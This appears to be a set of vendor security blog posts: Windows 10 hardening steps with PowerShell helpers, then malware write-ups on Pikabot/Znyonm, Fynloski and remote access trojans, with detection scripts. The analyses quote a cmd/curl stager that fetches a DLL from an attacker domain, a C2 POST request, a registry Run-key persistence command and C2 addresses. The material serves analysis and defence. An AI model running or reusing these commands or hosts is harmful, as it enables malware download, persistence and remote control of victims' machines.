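        -UsedSpaceOnly -RecoveryPasswordProtector -SkipHardwareTest

    # Step 4: write the 48-digit recovery password to the separate location.
    $rp = $vol.KeyProtector | Where-Object KeyProtectorType -eq 'RecoveryPassword'
    $file = Join-Path $RecoveryKeyFolder ('BitLocker-{0}-{1}.txt' -f $env:COMPUTERNAME, $drive.TrimEnd(':'))
    @(
        "Computer:          $env:COMPUTERNAME"
        "Drive:             $drive"
        "Protector ID:      $($rp.KeyProtectorId)"
        "Recovery password: $($rp.RecoveryPassword)"
    ) | Set-Content -Path $file

    # Step 3: unlock at startup with the TPM (swapped in for the post's password option).
    Add-BitLockerKeyProtector -MountPoint $drive -TpmProtector | Out-Null
    return $file
}

function Get-BitLockerSummary {
    # Encryption runs in the background; watch EncryptionPercentage climb to 100.
    Get-BitLockerVolume |
        Select-Object MountPoint, VolumeStatus, ProtectionStatus,
                      EncryptionPercentage, EncryptionMethod
}

Test-BitLockerReady
$keyFile = Protect-SystemDrive -RecoveryKeyFolder 'E:\'
Write-Host "Recovery key saved to $keyFile - keep it away from this PC."
Get-BitLockerSummary | Format-Table -AutoSize
```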

4. Use a Secure Password Manager with Two-Factor Authentication (2FA)

Simple passwords make user accounts vulnerable to hacks, making it crucial to use passwords that combine a complex array of letters and characters for enhanced protection. Remembering all these complex passwords can be challenging, which is why it’s wise to use a password manager. These tools store, auto-fill, and generate passwords for you. Most password managers also support two-factor authentication (2FA), adding an extra layer of security. This additional step might involve something like a fingerprint, a confirmation code sent to your phone, or a facial scan—essential measures to secure Windows 10 against unauthorized access.

Use password manager

5. Enable Controlled Folder Access to Prevent Ransomware Attacks

Ransomware attacks are a significant threat to personal and organizational data security. Windows 10 offers a robust feature called Controlled Folder Access within Windows Defender Security Center. This feature helps protect valuable data from malicious apps and threats, such as ransomware. By default, it protects common folders where documents, pictures, videos, and files are stored, and you can also add additional folders to be monitored to enhance protection.

To enable Controlled Folder Access, simply go to the Windows Defender Security Center, click on ‘Virus & threat protection,’ and navigate to the ‘Ransomware protection’ section. From there, you can switch on Controlled Folder Access. This simple step can significantly secure Windows 10 by blocking unauthorized applications from making changes to your protected folders.

How to protect your files from ransomware attacks by enabling Controlled Folder Access:

1. Open Windows Security Settings:

  • Click on the Start menu.
  • Type Windows Security in the search bar and open the app.

2. Navigate to Virus & Threat Protection:

  • In the Windows Security window, click on Virus & threat protection.

3. Access Ransomware Protection:

  • Scroll down and find the Ransomware protection section.
  • Click on Manage ransomware protection.

4. Enable Controlled Folder Access:

  • In the Ransomware protection settings, find the Controlled folder access section.
  • Switch the toggle to On to enable Controlled Folder Access.

5. Manage Protected Folders:

  • After enabling Controlled Folder Access, you can add or remove folders that you want to protect.
  • Click on Protected folders and then use the Add a protected folder button to select folders on your computer that you wish to protect.

6. Allow Apps Through Controlled Folder Access:

  • If you have legitimate apps that need to make changes to protected folders, you can allow them through this feature.
  • Under Allow an app through Controlled folder access, click on Add an allowed app and select the app you trust to make changes to protected folders.

7. Review and Test:

  • Once you’ve configured your settings, review everything to ensure it’s set up correctly.
  • Test the feature by attempting to modify files in the protected folders with a non-allowed application to check if the access is correctly blocked.
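Steps 4 to 7 with the Defender PowerShell cmdlets, including the "test with a non-allowed application" step, as an added example that is not part of the original post. The extra folder and allowed-app paths are assumptions for the example; cmd.exe plays the non-allowed application because it is not on Defender's trusted-app list.

```powershell
# Added example (not from the original post): Controlled Folder Access from an
# elevated PowerShell prompt, then a probe write to confirm it really blocks.
# 'D:\Projects' and the backup.exe path are assumed values; replace them.
#Requires -RunAsAdministrator

function Enable-ControlledFolderAccess {
    param(
        [string[]] $ExtraFolders = @(),   # step 5: folders beyond the defaults
        [string[]] $AllowedApps  = @()    # step 6: full paths of trusted executables
    )
    # Step 4: the toggle. 'AuditMode' would only log, useful for a dry run first.
    Set-MpPreference -EnableControlledFolderAccess Enabled
    foreach ($f in $ExtraFolders) { Add-MpPreference -ControlledFolderAccessProtectedFolders $f }
    foreach ($a in $AllowedApps)  { Add-MpPreference -ControlledFolderAccessAllowedApplications $a }
}

function Test-ControlledFolderAccess {
    param([string] $Folder = [Environment]::GetFolderPath('MyDocuments'))
    # Step 7: try to create a file in a protected folder from cmd.exe, which is not on
    # Defender's trusted-app list, then look for the block event Defender records.
    $probe = Join-Path $Folder 'cfa-probe.txt'
    $since = Get-Date
    cmd.exe /c "echo probe > `"$probe`"" 2>$null
    $written = Test-Path $probe
    if ($written) { Remove-Item $probe -Force }   # clean up if the write got through

    # Event ID 1123 = write blocked by Controlled Folder Access (1124 = audit only).
    $blocks = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1123
        StartTime = $since
    } -ErrorAction SilentlyContinue

    [pscustomobject]@{
        Folder       = $Folder
        WriteBlocked = -not $written
        BlockEvents  = @($blocks).Count
        LastMessage  = ($blocks | Select-Object -First 1).Message
    }
}

Enable-ControlledFolderAccess -ExtraFolders 'D:\Projects' `
                              -AllowedApps 'C:\Program Files\MyBackup\backup.exe'
$pref = Get-MpPreference
"Controlled folder access mode: $($pref.EnableControlledFolderAccess)"   # 1 = Enabled, 2 = Audit
Test-ControlledFolderAccess | Format-List
```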

6. Keep Your Browsing Private with a VPN, Especially on Public Wi-Fi

Using a VPN can significantly enhance your privacy and anonymity online by creating a private network from a public Internet connection. This security method not only masks your IP address but also makes your online activities nearly impossible to track. Moreover, a VPN provides a more encrypted and secure connection than a typical Wi-Fi hotspot. By creating a secure tunnel, a VPN helps conceal your browsing activities, allowing you to access region-blocked websites without exposure. This is an essential step to secure Windows 10 when using public Wi-Fi.

VPN security mechanism

7. Avoid Dangerous Pop-Ups

Although pop-up windows may seem merely annoying—wasting your time and slowing down your PC—they can also pose serious risks by infecting your device with malware. These pop-up banners are harmless until you click on them, which activates their damaging effects. Therefore, it’s crucial to be discerning about what you click on. To protect yourself, consider using an ad blocker or avoid visiting sites known for dubious pop-ups. If ad blockers don’t cut it, your device might already be compromised by malware. Scan your device with anti-malware software to eliminate any such threats and further secure Windows 10.

pop-ups
Pop-ups that have no relation to the original page

8. Install Anti-malware

Antivirus software will be your next level of protection against malware. For example, GridinSoft Anti-Malware can remove all malware from your computer. In addition, it scans the system for viruses, spyware, and adware and prevents rootkits or backdoors from invading your PC.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are many detections. Do not interrupt it, and you will get your system as clean as new.

Removal finished

Our tool can work without conflict with other antivirus programs as additional protection. GridinSoft Anti-Malware can free the user’s browser from third-party control and return it to its working state.

Trojan:Win32/Znyonm
https://gridinsoft.com/blogs/trojanwin32-znyonm-detection/
Thu, 27 Jun 2024 08:52:36 +0000

Trojan:Win32/Znyonm is a detection that often appears while backdoor malware is active in the background. Such malware can escalate privileges, enable remote access, or deploy more payloads. Let’s dive into this malicious program, understand how it works, and see how to remove it.

What is Trojan:Win32/Znyonm?

Trojan:Win32/Znyonm is a detection associated with backdoor malware, usually the kind that uses deep obfuscation and anti-analysis techniques. In particular, this detection name appears with malware like GuLoader, Remcos RAT, and Pikabot. Other families can appear under it too, since Microsoft does not tie this detection name to specific malware families but to their properties.

Trojan:Win32/Znyonm detection
Znyonm detection

The primary objectives of Znyonm include facilitating remote access or deploying additional payloads. As a preliminary stage, it establishes persistence within the system, escalates privileges, and communicates with command-and-control (C2) servers. Among the samples found on VirusTotal, I’ve seen multi-stage loading of code fragments from remote servers via .LNK, VBS, and PowerShell scripts. This allows it to bypass antivirus detection and deliver any malicious payload to the victim’s computer.

Znyonm Trojan Analysis

For the Znyonm sample to analyze, I’ve picked one of the fresh Pikabot samples. Pikabot is a modular backdoor that emerged in early 2023 and gained prominence as a substitute for the infamous QakBot. It serves as an initial access point in high-profile cyberattacks; its primary tactics for initial access are spear phishing and thread hijacking. Pikabot then deploys exploit kits, ransomware, or other malware tools.

Spreading ways

Znyonm/Pikabot gains initial access through spear phishing. It targets users with convincing emails that look like routine workflow messages; the fraudsters rely on thread hijacking in particular to make them look genuine. The attachment format varies, from a PDF document to a ZIP archive that contains the payload. In either case, the email text tries to convince the user to open the attachment and follow its instructions.

Phishing email screenshot
Typical example of a message that spreads Pikabot. (Source: ANY.RUN)

Another method is malvertising via major ad engines like Google or Facebook. Hackers trick users into downloading and installing malware by using the names of popular free software, drivers, and tools. The sites used in these campaigns live for an extremely short time but can infect hundreds of users.

Unpacking, Launch & Persistence

Upon execution, Znyonm runs a set of checks to avoid analysis by calling NtQueryInformationProcess. Then it decrypts the DLL file and performs another round of anti-analysis and anti-debug tricks. After passing them, the malware assembles its core from encrypted parts of the DLL it arrives in. To gain persistence and privileges, Pikabot/Znyonm performs process hollowing.

"C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://ucakbiletsorgulama.com/U14/0.16930199040452631.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll

Pikabot avoids detection by calling the first 3 APIs it needs directly, by hash; after that it switches to dynamic API resolution to evade EDR/XDR detection. The malware checks the system language before gathering system information and stops executing if the language is on its ban list. After passing the check, it collects system properties to fingerprint the system.

Pikabot code snippet screenshot
Pikabot checks the system language

The fingerprint includes the user name, computer name, display information, CPU information, physical and virtual memory, domain controller name, operating system version, and a snapshot of its process. This is a typical data set for backdoor malware, meant to distinguish one system from another. Over time, though, some backdoors have gained the ability to collect more data, moving closer to spyware in functionality.

C2 Communication

The malware sends the collected data to the command server using an HTTP POST request over HTTPS. On first contact, the command server responds with a command and configuration info. The latter consists of a command-specific code, URL, file address, and the action the malware should execute. Some of the commands also require Pikabot to send the results back to the C2.

POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
Content-Length: 6778
Host: 158.220.80.167:2967

00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b7d3971ef2d449e3edf6c04a9b8a97e149a614ebd34843448608687698bae262d662b73bb316692e52e5840c51a0bad86e33c6f8926eb850c2
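Two artifacts above lend themselves to detection: the cmd.exe/curl stager command line and the C2 POST, whose Host header (158.220.80.167:2967) does not even match the request target (15.235.47.80:23399). The following is an added example, not part of the original analysis, that runs simple rules over constructed sample data; only the two artifacts quoted from the analysis are real, the benign lines are made up.

```powershell
# Added example (not from the original post): detection rules for the stager command
# and the C2 request shown above, run over constructed sample data.

function Test-StagerCommandLine {
    # Flags the "cmd /c mkdir <random dir> & curl <url> --output <dir>\<name>.dll"
    # pattern. Input: one process-creation command line (Sysmon event 1, or Security
    # event 4688 with command-line auditing enabled).
    param([Parameter(Mandatory)] [string] $CommandLine)
    $reasons = @()
    if ($CommandLine -match '(?i)\bcmd(\.exe)?"?\s+/c\b' -and $CommandLine -match '(?i)\bcurl(\.exe)?\b') {
        $reasons += 'cmd.exe spawning curl'
    }
    if ($CommandLine -match '(?i)--output\s+"?[A-Z]:\\[^\s"]+\.dll') {
        $reasons += 'curl writing a .dll to disk'
    }
    if ($CommandLine -match '(?i)\bmkdir\s+[A-Z]:\\[A-Za-z]{8,}\\[A-Za-z]{8,}') {
        $reasons += 'two-level pseudo-random directory'
    }
    [pscustomobject]@{ Suspicious = $reasons.Count -ge 2; Reasons = $reasons; CommandLine = $CommandLine }
}

function Test-C2Request {
    # Parses one raw HTTP request (request line + headers) and flags the traits of the
    # Pikabot POST above: Host header that does not match the request target, a raw
    # IP with an unusual port, and an Office user-agent that sends POSTs.
    param([Parameter(Mandatory)] [string] $RawRequest)
    $lines = $RawRequest -split "`r?`n"
    if ($lines[0] -notmatch '^(?<method>[A-Z]+)\s+(?<target>\S+)') { throw 'not an HTTP request line' }
    $method = $Matches.method
    $target = $Matches.target -replace '^hxxp', 'http'   # undo the defanging used above
    $headers = @{}
    foreach ($l in $lines | Select-Object -Skip 1) {
        if ($l -eq '') { break }                          # blank line ends the header block
        if ($l -match '^([^:]+):\s*(.*)$') { $headers[$Matches[1].ToLowerInvariant()] = $Matches[2] }
    }
    $reasons = @()
    if ($target -match '^https?://') {
        $uri = [uri]$target
        if ($headers['host'] -and $headers['host'] -ne $uri.Authority) {
            $reasons += "Host header $($headers['host']) differs from target $($uri.Authority)"
        }
        if ($uri.HostNameType -eq 'IPv4' -and $uri.Port -notin 80, 443) {
            $reasons += "raw IP with non-standard port $($uri.Port)"
        }
    }
    if ($method -eq 'POST' -and $headers['user-agent'] -match 'Microsoft Office') {
        $reasons += 'Office user-agent issuing a POST'
    }
    [pscustomobject]@{ Suspicious = $reasons.Count -ge 2; Reasons = $reasons }
}

# Constructed sample: the stager command from the analysis plus two benign lines.
$sampleCommandLines = @(
    '"C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://ucakbiletsorgulama.com/U14/0.16930199040452631.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll',
    '"C:\Windows\System32\cmd.exe" /c dir C:\Users\alice\Documents',
    'curl.exe -sS https://example.com/status --output C:\Temp\status.json'
)
$sampleCommandLines | ForEach-Object { Test-StagerCommandLine $_ } |
    Format-Table Suspicious, Reasons -AutoSize

# Constructed sample: the request line and headers captured above, body omitted.
$sampleRequest = @'
POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
Content-Length: 6778
Host: 158.220.80.167:2967

<encrypted fingerprint body omitted>
'@
Test-C2Request $sampleRequest | Format-List
```

Both rules require two independent hits before marking input suspicious, which keeps a lone curl download or a single odd header from paging anyone.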

How to Remove Trojan:Win32/Znyonm?

If you receive a notification about a Trojan:Win32/Znyonm detection, an anti-malware scan is needed. As you can see from the analysis above, Znyonm is nothing to mess around with and can lead to more serious and diverse malware infections. Gridinsoft Anti-Malware will fit perfectly for malware removal.


Behavior:Win32/Fynloski.gen!A
https://gridinsoft.com/blogs/behavior-win32-fynloski-gen-a/
Wed, 05 Jun 2024 14:52:17 +0000

Behavior:Win32/Fynloski.gen!A is a heuristic detection of Microsoft Defender that flags activities of Fynloski malware. This malicious program allows attackers to control the infected system and install other malware remotely. Such malware usually spreads through email attachments and software from low-trust sources.

Behavior:Win32/Fynloski.gen!A Overview

Behavior:Win32/Fynloski.gen!A is a detection name used by Microsoft Defender to identify a specific type of malicious behavior associated with the Fynloski malware family. This malware group is not a stand-alone family, but rather a group of malicious programs that share code similarities. It’s a heuristic detection, meaning it detects Fynloski-like malware based on its actions rather than a specific signature.

Behavior:Win32/Fynloski.gen!A Detection

Fynloski malware typically allows attackers to control the infected system remotely, a normal function for a backdoor. It can steal sensitive information such as passwords, personal data, and banking details, capture screenshots, record keystrokes, monitor user activities – overall, act as spyware. It can also download and install other malicious software onto the infected system. Win32/Fynloski spreads through email attachments, downloads from compromised websites, and software from untrusted sources.

Technical Analysis

Let’s look at how this works using a specific example. After infiltrating the system, it performs checks typical of most malware to detect the presence of a virtual environment or debugger. The malware checks the following locations:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\System\ConfigureTelemetryOptInSettingsUx

These keys can contain information about configurations used for security and telemetry collection in virtual environments. The malware stops executing if it finds any traces of virtualization here.

After finishing the initial checks, Fynloski collects system information. This information does not include confidential data; its purpose is to create a digital fingerprint of the system for future identification. The malware collects information from the following locations:

C:\Windows\AppCompat\Programs\Amcache.hve
C:\Windows\System32\drivers
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy

The first file contains information about recently launched programs and installed software, which can provide insight into the system configuration and installed applications. The subsequent registry keys contain information about the user and OS settings.

To avoid detection, the reviewed sample uses standard encoding algorithms. This differs from one sample to another, however: some of the more sophisticated samples use deep encryption that is lifted only at runtime. Also, considering that the original detection comes from the heuristic engine, there is a high chance that the samples use unique packing or rebuilding, which further enhances detection evasion.

Execution

After performing all checks and gathering the necessary information, the malware establishes persistence in the system. It executes the following shell command:

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support GFX" /t REG_SZ /d "%APPDATA%\Xpers\Gpers.exe" /f

This command adds an entry to the current user’s Run key, so the program starts each time the user logs in.
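An audit of the Run keys this command writes to, as an added example that is not part of the original post: it flags entries like "%APPDATA%\Xpers\Gpers.exe" that start a binary from a user-writable folder, point at a missing file, or lack a valid Authenticode signature. Run it in an elevated prompt so the HKLM keys are readable too.

```powershell
# Added example (not from the original post): list Run/RunOnce autostarts and flag
# the ones that look like the persistence entry above.

function Get-SuspiciousRunEntries {
    $keys = @(
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    # Folders any user can write to; legitimate autostarts rarely live here.
    $userWritable = @($env:APPDATA, $env:LOCALAPPDATA, $env:TEMP, $env:PUBLIC)

    foreach ($key in $keys) {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # PowerShell's own provider metadata
            # Expand %APPDATA% and friends, then pull the executable path out of the
            # command line (quoted path, or the first token when unquoted).
            $cmd = [Environment]::ExpandEnvironmentVariables([string]$p.Value)
            $exe = if ($cmd -match '^"([^"]+)"') { $Matches[1] } else { ($cmd -split '\s+')[0] }
            if (-not $exe) { continue }

            $reasons = @()
            if ($userWritable | Where-Object { $_ -and $exe.StartsWith($_, 'OrdinalIgnoreCase') }) {
                $reasons += 'runs from user-writable folder'
            }
            if (Test-Path -LiteralPath $exe) {
                $sig = Get-AuthenticodeSignature -FilePath $exe
                if ($sig.Status -ne 'Valid') { $reasons += "signature $($sig.Status)" }
            } else {
                $reasons += 'target file missing'
            }
            [pscustomobject]@{
                Key        = $key
                Name       = $p.Name
                Command    = $cmd
                Reasons    = $reasons
                Suspicious = $reasons.Count -gt 0
            }
        }
    }
}

Get-SuspiciousRunEntries | Where-Object Suspicious |
    Format-Table Key, Name, Command, Reasons -AutoSize
```

An unsigned installer's updater will show up here as well; the point is a short list to review, not an automatic verdict.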

Next, Fynloski connects to its Command and Control (C2) server to transmit information to the attackers and receive further commands. The following addresses are used for this purpose:

tcp://betclock.zapto.org:35000
UDP a83f:8110:0:0:4b8e:21:0:0:53
TCP 23.216.147.64:443
TCP 192.229.211.108:80
TCP 20.99.185.48:443

How To Remove Behavior:Win32/Fynloski.gen!A

To remove Behavior:Win32/Fynloski.gen!A, I recommend using advanced anti-malware software. GridinSoft Anti-Malware is an excellent option as it can neutralize the threat even during the early attack stages. Download it, run a Full scan and remove all the threats that it has detected.

Behavior:Win32/Fynloski.gen!A

Remote Access Trojan (RAT)
https://gridinsoft.com/blogs/remote-access-trojan-meaning/
Thu, 16 May 2024 02:11:57 +0000

A Remote Access Trojan is software that allows unauthorized access to a victim’s computer or covert surveillance. Remote Access Trojans are often disguised as legitimate programs and give the attacker unhindered access. Their capabilities include tracking user behavior, copying files, and using bandwidth for criminal activity.

What is a Remote Access Trojan (RAT)?

A Remote Access Trojan (RAT) is a malicious program that opens a backdoor, allowing an attacker to control the victim’s device completely. Users often download RATs together with a legitimate program, e.g., inside cracked games from torrents or within an email attachment. Once an attacker compromises the host system, they can use it to spread RATs to additional vulnerable computers, thus creating a botnet. A RAT can also be deployed as a payload by an exploit kit. Once deployed, the RAT connects directly to the command-and-control (C&C) server the attackers control, using a predefined open TCP port on the compromised device. Because the RAT provides administrator-level access, an attacker can do almost anything on a victim’s computer, such as:

  • Use spyware and keyloggers to track the victim’s behavior
  • Gain access to sensitive data, including social security numbers and credit card information
  • View and record video from a webcam and microphone
  • Take screenshots
  • Format disks
  • Download, change or delete files
  • Distribute malware and viruses

How does a Remote Access Trojan work?

Like any other type of malware, a RAT can be attached to an email or posted on a malicious website. Cybercriminals can also exploit a vulnerability in a system or program. A RAT is similar to Remote Desktop Protocol (RDP) or AnyDesk but differs in its stealth. The RAT establishes a command and control (C2) channel with the attacker’s server, so attackers can send commands to it and it can return data. RATs also have a set of built-in controls and methods for hiding their C2 traffic from detection.

Remote access trojan mechanism

RATs can be combined with additional modules that provide other capabilities. For example, suppose an attacker gains a foothold using a RAT and, after examining the infected system, decides to install a keylogger. Depending on the attacker’s needs, the RAT may have a built-in keylogging feature, the ability to download and add a keylogger module, or the ability to load and run an independent keylogger.
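A quick hunt for the C2 channel a RAT keeps open, as an added example that is not part of the original post: it lists established outbound TCP connections with their owning process and flags the combinations a backdoor tends to produce. The "common ports" list is an assumption for the example and should be tuned to the environment; run it elevated so process paths are readable for every process.

```powershell
# Added example (not from the original post): established outbound connections
# joined to their owning process, scored by traits typical of a RAT C2 channel.
#Requires -RunAsAdministrator

function Get-OutboundConnectionReport {
    param(
        # Ports where ordinary traffic is expected; anything else earns a point.
        # Assumed list for this example, tune it to your environment.
        [int[]] $CommonPorts = @(80, 443, 53, 25, 587, 993, 995, 22, 3389),
        # Folders any user can write to; a process running from here earns a point.
        [string[]] $UserWritable = @($env:APPDATA, $env:LOCALAPPDATA, $env:TEMP, $env:PUBLIC)
    )
    $procs = @{}
    Get-Process | ForEach-Object { $procs[$_.Id] = $_ }

    Get-NetTCPConnection -State Established |
        # Skip loopback and RFC 1918 peers; C2 servers live on the Internet.
        Where-Object { $_.RemoteAddress -notmatch '^(127\.|::1$|10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)' } |
        ForEach-Object {
            $conn = $_
            $p = $procs[[int]$conn.OwningProcess]
            $path = if ($p) { $p.Path } else { $null }   # $null for protected/system processes
            $reasons = @()
            if ($conn.RemotePort -notin $CommonPorts) {
                $reasons += "uncommon port $($conn.RemotePort)"
            }
            if ($path -and ($UserWritable | Where-Object { $_ -and $path.StartsWith($_, 'OrdinalIgnoreCase') })) {
                $reasons += 'process runs from user-writable folder'
            }
            if (-not $path) { $reasons += 'process path unavailable' }
            [pscustomobject]@{
                Process = if ($p) { $p.ProcessName } else { '?' }
                PID     = $conn.OwningProcess
                Path    = $path
                Remote  = "$($conn.RemoteAddress):$($conn.RemotePort)"
                Reasons = $reasons
                Score   = $reasons.Count
            }
        } | Sort-Object Score -Descending
}

Get-OutboundConnectionReport | Where-Object Score -gt 0 | Format-Table -AutoSize
```

A browser talking to port 443 scores zero; a process in %APPDATA% holding a connection to a bare IP on a high port scores two and goes to the top of the list.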

Why Is a Remote Access Trojan Dangerous?

A 2015 incident in Ukraine illustrates the nefarious nature of RAT programs. At the time, attackers used remote-control malware to cut power to 80,000 people. They did this by gaining remote access to a computer authenticated to the SCADA (supervisory control and data acquisition) machines that controlled the country’s utility infrastructure. In addition, the Remote Access Trojan allowed the attackers to reach sensitive resources by using the elevated privileges of the authenticated user on the network. An attack using RATs can thus take on a threatening scale, up to a threat to national security.

Unfortunately, cybersecurity teams often have difficulty detecting RATs. This is because malware typically carries many concealing features, allowing it to avoid any detection. In addition, RATs manage resource utilization levels so that there is no performance degradation, making it difficult to detect the threat.

Ways of using Remote Access Trojan

The following are ways in which a RAT attack can compromise individual users, organizations, or even entire populations:

  • Spying and blackmail: An attacker who has deployed a RAT on a user’s device gains access to the user’s cameras and microphones. Consequently, he can take pictures of the user and his surroundings and then use this to launch more sophisticated attacks or blackmail.
  • Launch Distributed Denial of Service (DDoS) Attacks: Attackers install RATs on many user devices, then use those devices to flood the target server with spoofed traffic. Even though the attack can cause network performance degradation, users are often unaware that hackers use their devices for DDoS attacks.
  • Cryptomining: In some cases, attackers can use RATs to mine cryptocurrency on the victim’s computer. By scaling this action to many devices, they can make huge profits.
  • Remote file storage: Sometimes attackers can use RATs to store illegal content on unsuspecting victims’ machines. That way, authorities can’t shut down the attacker’s account or storage server because he keeps information on devices belonging to legitimate users.
  • Industrial Systems Compromise: As described above, attackers can use RATs to gain control over large industrial systems. These could be utilities such as electricity and water supplies. As a result, an attacker can cause significant damage to the industrial equipment by sabotaging these systems and disrupting critical services in entire areas.

Remote Access Trojan Examples

njRAT

njRAT is probably the best known and the oldest among remote-access trojans. It first appeared in 2012 and keeps getting updates that adjust its functionality to modern “standards”, which accounts for its longevity. The reason for this is probably the attention from state-sponsored threat actors, APT36 and APT41, who have used it in cyberattacks almost since its inception.

Njrat interface
Interface of njRAT 0.7 Golden edition

The key functionality of njRAT is typical for pretty much any remote-access trojan: providing remote access. This is topped up with uploading and downloading files on command, logging keystrokes, and capturing microphone and camera input. Some of its variants can also grab credentials from browsers and cryptocurrency apps.

One interesting feature of this remote access trojan is its naming. Threat analysts use its original name interchangeably with Bladabindi. The latter is a detection name that Microsoft assigned to this trojan back in its early days. Usually, Redmond changes the naming as the malware gains volume and power, but this did not happen here.

Sakula

Sakula looks like harmless software with a legitimate digital signature. However, the malware first appeared in 2012 and is used against high-level targets. It gives attackers full remote administration of the device and uses simple unencrypted HTTP requests to communicate with the C&C server. Additionally, it uses the Mimikatz password stealer to authenticate with a pass-the-hash technique that reuses operating system authentication hashes to hijack existing sessions.

KjW0rm

KjW0rm is a worm written in VBS in 2014 that uses obfuscation, making it difficult to detect on Windows computers. It has many variations; the older parent version is called “Njw0rm”. The malware and all other variants belong to the same family, with many features and similarities in its workflow. It deploys stealthily and then opens a backdoor that allows attackers to gain complete control of the machine and send data back to the C&C server.

Havex

Havex is a Remote Access Trojan discovered in 2013 as part of a large-scale spying campaign targeting industrial control systems (ICS) used in many industries. Its author is a hacker group known as Dragonfly, or Energetic Bear. It gives attackers complete control over industrial equipment. Havex uses several mutations to avoid detection and has a minimal footprint on the victim’s device. It communicates with the C&C server via HTTP and HTTPS.

Agent.BTZ/ComRat

Agent.BTZ/ComRat (also called Uroburos) is a Remote Access Trojan that became infamous after hackers used it to break into the U.S. military in 2008. The first version of this malware was probably released in 2007 and had worm-like properties, spreading via removable media. From 2007 to 2012, its developers released two significant versions of the RAT. Most likely, this is a development of the Russian government. It can be deployed via phishing attacks and uses encryption, anti-analysis, and anti-forensic techniques to avoid detection. In addition, it provides complete administrative control over the infected machine and can transmit data back to its C&C server.

Dark Comet

Backdoor.DarkComet is a Remote Access Trojan application that runs in the background and stealthily collects information about the system, connected users, and network activity. This Remote Access Trojan was first identified in 2011 and is still actively used today. It provides complete administrative control over infected devices. For example, it can disable task manager, firewall, or user access control (UAC) on Windows machines. In addition, Dark Comet uses encryption, thereby avoiding detection by antivirus.

AlienSpy

AlienSpy is a RAT that supports multiple platforms. This allows payload creation for Windows, Linux, Mac OS X, and Android operating systems. It can collect information about the target system, activate the webcam, and securely connect to the C&C server, providing complete control over the device. In addition, AlienSpy uses anti-analysis techniques to detect the presence of virtual machines. According to the researcher who analyzed the threat, the operator of the service is a native Spanish speaker, probably Mexican.

Heseber BOT

The Heseber BOT is based on the traditional VNC remote access tool. It uses VNC to remotely control the target device and transfer data to the C&C server. However, it does not provide administrative access to the machine unless the user has such permissions. Since VNC is a legitimate tool, antivirus tools do not identify Heseber as a threat.

Sub7

Sub7 is a Remote Access Trojan that runs on a client-server model. The backdoor was first discovered in May 1999 and ran on Windows 9x and the Windows NT family of operating systems up to Windows 8.1. The server is a component deployed on the victim machine, and the client is the attacker’s GUI to control the remote system. The server tries to install itself into a Windows directory and, once deployed, provides webcam capture, port redirection, chat, and an easy-to-use registry editor.

Back Orifice

Back Orifice is a Remote Access Trojan for Windows introduced in 1998. It supports most versions beginning with Windows 95 and is deployed as a server on the target device. It takes up little space, has a GUI client, and allows an attacker to gain complete control over the system. RAT can also use image processing techniques to control multiple computers simultaneously. The server communicates with its client via TCP or UDP, usually using port 31337.

How To Protect Against Remote Access Trojan?

As stated above, Remote Access Trojans rely on their stealthiness. Once it has appeared, you will likely struggle to detect it, even if the exact malware sample is not new. That’s why the best way to protect against Remote Access Trojan is to not even give it a chance to run. The following methods represent proactive actions that severely decrease the chance of malware introduction and the possibility of getting in trouble.

Security training

Unfortunately, the weakest link in any defense is the human element, which is the root cause of most security incidents, and RATs are no exception. Therefore, a strategy for defending against RATs depends on organization-wide security training. In addition, victims usually launch this malware through infected attachments and links in phishing campaigns. Therefore, employees must be vigilant so that they do not accidentally contaminate the company network and jeopardize the entire organization.

Using multi-factor authentication (MFA)

Since RATs typically try to steal passwords and usernames for online accounts, using MFA can minimize the consequences if a person’s credentials are compromised. The main advantage of MFA is that it provides additional layers of security and reduces the likelihood that a consumer’s identity will be compromised. For example, suppose one factor, such as the user’s password, is stolen or compromised. In that case, the other factors provide an additional layer of security.

